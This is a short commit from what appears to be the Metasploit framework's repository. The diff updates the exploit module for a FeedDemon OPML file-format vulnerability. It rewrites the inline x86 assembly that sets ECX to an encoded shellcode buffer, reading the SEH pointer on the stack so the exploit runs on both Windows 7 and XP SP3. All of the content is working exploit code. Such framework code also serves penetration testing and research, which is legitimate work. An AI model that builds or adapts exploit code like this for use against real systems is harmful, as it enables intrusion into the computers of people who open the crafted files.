update the set_ecx method to work on both win7 and xpsp3

git-svn-id: file:///home/svn/framework3/trunk@9414 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/fileformat/feeddemon_opml.rb

@@ -100,13 +100,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		footer = Rex::Text.to_unicode(foot_opml)
 
 		# Set ECX to point to the alphamixed encoded buffer (IIIII...)
-		# We use an offset from esp, while avoiding bad chars
-		off = 0x410
+		# We use, while avoiding bad chars, an offset from SEH ptr stored on the stack at esp+8
+		off = 0x1ff2
 		set_ecx_asm = %Q|
-			push esp
-			pop ecx
-			add ecx, #{0x01010101 + off}
-			sub ecx, 0x01010101
+			mov ecx, [esp+8]
+			sub ecx, #{0x01010101 + off}
+			add ecx, 0x01010101
 		|
 		set_ecx = Metasm::Shellcode.assemble(Metasm::Ia32.new, set_ecx_asm).encode_string